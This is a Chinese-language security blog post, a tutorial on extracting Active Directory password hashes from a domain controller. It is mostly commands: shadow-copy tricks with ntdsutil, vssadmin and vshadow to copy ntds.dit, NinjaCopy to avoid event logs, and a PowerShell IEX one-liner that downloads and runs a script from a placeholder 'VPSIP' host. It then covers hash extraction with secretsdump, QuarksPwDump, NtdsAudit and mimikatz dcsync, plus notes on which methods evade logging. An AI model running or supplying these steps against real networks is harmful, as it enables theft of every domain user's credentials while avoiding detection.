域内密码凭证获取

  • A+
所属分类:安全博客

域内密码凭证获取

/01 Volume Shadow Copy

一,活动目录数据库

ntds.dit

活动目录数据库,包括有关域用户、组和组成员身份的信息。它还包括域中所有用户的密码哈希值。

ntds.dit文件位于C:/Windows/NTDS/ntds.dit

为了保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。因此想要破解sam 文件与ntds.dit文件都需要拥有一个system文件。

AD DS数据存储

  • 由 ntds.dit 文件构成
  • 默认存储在所有域控制器上的 %SystemRoot%NTDS 文件夹中
  • 只能通过域控制器进程和协议访问

由于Windows阻止对这些文件的标准读取或复制操作,因此必须使用特殊技术来获取副本。

二,Volume Shadow Copy

Volume Shadow Copy Service 是微软从 Windows XP 开始提供的用于创建一致性的时间点副本(也就是快照) 的服务框架。

  • 用于数据备份
  • 支持Windows Server 2003 及以上操作系统
  • 系统默认在特定条件下自动创建数据备份,如补丁安装后。在Win7系统大概每隔一周自动创建备份,该时间 无法确定
  • 禁用VSS会影响系统正常使用,如 System Restore和 Windows Server Backup

三,Ntdsutil

Ntdsutil.exe

一个为 Active Directory 提供管理设施的命令行工具,域环境默认安装。

支持系统:

  • Server 2003
  • Server 2008
  • Server 2012

snapshot交互式

1
2
3
4
5
6
7
8
9
ntdsutil
snapshot
activate instance ntds
create
mount [GUID]
unmout [GUID]
del [GUID]
quit
quit

域内密码凭证获取

重要命令解析:

  • ntdsutil进入工具,
  • activate instance ntds进入子工具,
  • create创建快照,
  • mount [GUID]挂载快照
  • unmout [GUID]卸载快照,
  • del [GUID]删除快照,
  • quit推出

域内密码凭证获取

snapshot非交互式

1.查询当前系统的快照

1
2
3
ntdsutil snapshot "List All" quit quit

ntdsutil snapshot "List Mounted" quit quit

没有快照的时候:

域内密码凭证获取

有快照且挂载后:

域内密码凭证获取

2.创建快照

1
ntdsutil snapshot "activate instance ntds" create quit quit

域内密码凭证获取

3.挂载快照

1
ntdsutil snapshot "mount {daee5123-b284-47fe-b02e-6e67e8d80fb1}" quit quit

域内密码凭证获取

4.复制ntds.dit

1
copy C:$SNAP_202008271744_VOLUMEC$windowsNTDSntds.dit c:ntds2.dit

域内密码凭证获取

域内密码凭证获取

或者直接download下来

域内密码凭证获取

域内密码凭证获取

5.卸载快照

1
ntdsutil snapshot "unmount {daee5123-b284-47fe-b02e-6e67e8d80fb1}" quit quit

6.删除快照

1
ntdsutil snapshot "delete {daee5123-b284-47fe-b02e-6e67e8d80fb1}" quit quit

域内密码凭证获取

域内密码凭证获取

activate instance ntds交互式

1
2
3
4
5
6
7
ntdsutil
activate instance ntds
ifm
create full <Drive>:<Folder>
quit
quit

域内密码凭证获取

发现C盘多了一个administrator文件夹

域内密码凭证获取

activate instance ntds非交互式

1
ntdsutil "activate instance ntds" ifm "create full C:ntds" quit quit

域内密码凭证获取

域内密码凭证获取

Vssadmin

vssadmin

是Windows系统提供的卷影复制服务(VSS)的管理工具,域环境默认安装。

  • 用于创建或删除卷影副本,列出卷影副本的信息
  • 用于显示所有安装的所有卷影副本写入程序和提供程序
  • 改变卷影副本存储空间的大小等

1.查询当前系统的快照

1
vssadmin list shadows

没有时:

域内密码凭证获取

有时:

域内密码凭证获取

2.创建快照

1
vssadmin create shadow /for=c:

域内密码凭证获取

3.获得Shadow Copy Volume Name

1
\?GLOBALROOTDeviceHarddiskVolumeShadowCopy5

4.复制ntds.dit

1
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy5windowsNTDSntds.dit c:ntds3.dit

域内密码凭证获取

域内密码凭证获取

5.删除快照

1
vssadmin delete shadows /for=c: /quiet

域内密码凭证获取

五,Vshadow

Vshadow:是一个简单的指令行工具,它允许任何人创建卷影拷贝。系统默认不支持,可在Microsoft

Windows Software Development Kit (SDK)中获得该工具。

1.查询当前系统的快照

1
vshadow.exe -q

域内密码凭证获取

域内密码凭证获取

2.创建快照

1
vshadow.exe -p -nw C:

域内密码凭证获取

参数说明:

-p persistent,备份操作或是重启系统不会删除

-nw no writers,用来提高创建速度 C: 对应c盘

获得SnapshotSetID、SnapshotID、Shadow copy device name

3.复制ntds.dit

1
copy [Shadow copy device name]windowsntdsntds.dit c:ntds.dit

域内密码凭证获取

4.删除快照

1
2
vshadow -dx=ShadowCopySetId
vshadow -ds=ShadowCopyId

域内密码凭证获取

六,拓展

调用Volume Shadow Copy服务会产生日志文件,位于System下,Event ID为7036

执行ntdsutil snapshot “activate instance ntds” create quit quit会额外产生Event ID为98的日志文件

所以之前的方式都会留下日志文件。

域内密码凭证获取

访问快照中的文件

查看快照列表:

1
vssadmin list shadows

无法直接访问 ?GLOBALROOTDeviceHarddiskVolumeShadowCopy12 中的文件 可通过创建符号链接访问快照中的文件:

1
mklink /d c:testvsc \?GLOBALROOTDeviceHarddiskVolumeShadowCopy12

域内密码凭证获取

符号链接:

1
rd c:testvsc

/02 NinjaCopy

一,NinjaCopy

通过NinjaCopy获得域控服务器NTDS.dit文件

没有调用Volume Shadow Copy服务,所以不会产生日志文件7036。

1
2
3
4
5
6
Import-Module .invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path C:WindowsSystem32configSAM -LocalDestination .sam.hive
Invoke-NinjaCopy -Path C:WindowsSystem32configSYSTEM -LocalDestination .system.hive
Invoke-NinjaCopy -Path C:windowsntdsntds.dit -LocalDestination
"C:UsersAdministratorDesktopntds.dit"

二,Powershell加载

1
2
3
4
powershell-import C:UsersMINGYDesktopInvoke-NinjaCopy.ps1
powershell Invoke-NinjaCopy -Path C:WindowsSystem32configSAM -LocalDestination c:sam.hive
powershell Invoke-NinjaCopy -Path C:WindowsSystem32configSYSTEM -LocalDestination c:system.hive
powershell Invoke-NinjaCopy -Path "C:windowsntdsntds.dit" -LocalDestination C:ntds.dit

三,远程加载

1
2
3
4
5
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://VPSIP/InvokeNinjaCopy.ps1');Invoke-NinjaCopy -Path C:WindowsSystem32configSAM -LocalDestination c:sam1.hive

powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://VPSIP/InvokeNinjaCopy.ps1');Invoke-NinjaCopy -Path C:WindowsSystem32configSYSTEM -LocalDestination c:system1.hive

powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://VPSIP/InvokeNinjaCopy.ps1');Invoke-NinjaCopy -Path C:Windowsntdsntds.dit -LocalDestination c:ntds1.dit

/03 解密ntds.dit

一,QuarksPwDump(需要就地运行)

Quarks PwDump 是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用 户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。

1.修复复制出来的数据库文件

1
esentutl /p /o ntds.dit

2.使用QuarksPwDump直接读取信息并将结果导出至文件

1
2
QuarksPwDump.exe --dump-hash-domain --output mingy.com.txt --ntds-file ntds.dit

域内密码凭证获取

解密建议就地解密,工具会自动获取system文件来解密,如换环境,就会结果不一样

域内密码凭证获取

二,Secretsdump

impacket 套件中的 secretsdump.py 脚本解密,速度有点慢

1
2
3
4
#数据库信息解密需要system32/config里面的sam,security,system文件
secretsdump.exe -sam sam.hiv -security security.hiv -system sys.hiv LOCAL
#ntds解密
secretsdump.exe -system system.hive -ntds ntds.dit LOCA

三,NtdsAudit(会生成文件报告比较好用,尽量本地运行)

可以十分高效的破解ntds文件并将全部域用户信息导出方便查找域用户状态。

将ntds.dit文件和SYSTEM文件放在同一目录下执行命令

1
NtdsAudit.exe "ntds.dit" -s "system.hive" -p pwdump.txt --users-csv users.csv

四,Mimikatz(猕猴桃永远的神)

Mimikatz有一个功能(dcsync),它可以利用目录复制服务(Directory Replication Service, DRS)从 NTDS.DIT文件中提取密码哈希值。

  • 通过dcsync直接获取mingy域内所有用户hash

    1
    lsadump::dcsync /domain:mingy.com /all /csv
  • 获取单个用户的详细信息

    1
    mimikatz lsadump::dcsync /domain:mingy.com /user:krbtgt
  • 查看所有用户的所有详细信息

    1
    mimikatz lsadump::lsa /inject

Tips:

活动目录

Ntds.dit

%SystemRoot%NTDS文件夹

VSC是xp的备份

Ntdsutil.exe

ntdsutil:snashot

Activate instance ntds

Create

Mount

原理是生成快照,对快照进行操作

Chcp 65001转英文,防止出现乱码

Vssadmin

VSS管理工具

Ntdsutiy

vssadmin

系统已经安装

NinjaCopy不会产生日志文件

VSS-ntasutil

- Vssadmin

Novss mimikatz

​ NgjinCopy

FROM :https://ailumao.cn/ | Author:Ailumao

相关推荐: 记一次相对完整的渗透测试

教育src 700rank了想着继续冲一波分,早日上核心,于是就有了下面这一次渗透测试的过程了。 开局一个登陆框,且存在密码找回功能。 归属为某教育局 开启burp 抓取登陆包,发现用户密码并未加密 ,尝试爆破admin账户密码 跑了一下发现报如下错误,看来爆…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: